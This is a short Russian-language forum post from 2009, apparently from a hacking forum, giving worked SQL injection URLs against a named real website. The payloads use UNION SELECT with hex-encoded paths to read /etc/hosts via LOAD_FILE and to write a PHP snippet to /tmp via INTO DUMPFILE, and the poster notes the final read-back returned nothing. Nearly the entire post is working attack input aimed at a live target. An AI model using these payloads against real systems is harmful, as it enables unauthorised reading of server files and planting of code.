27.10.2009, 23:09
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
Пример
читаем /etc/hosts
http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F6574632F686F7374 73),2
в исходнике смортим он есть
пишем <? phpinfo(); ?>
http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+0x3C3F20706870696E666F28293B20 3F3E,2+FROM+mysql.user+INTO+DUMPFILE+'/tmp/12345'
читаем
/tmp/12345
http://www.dimex.ru/cat.php?p=-1&c=13+UNION+SELECT+LOAD_FILE(0x2F746D702F31323334 35),2
и ниче (
|
|
|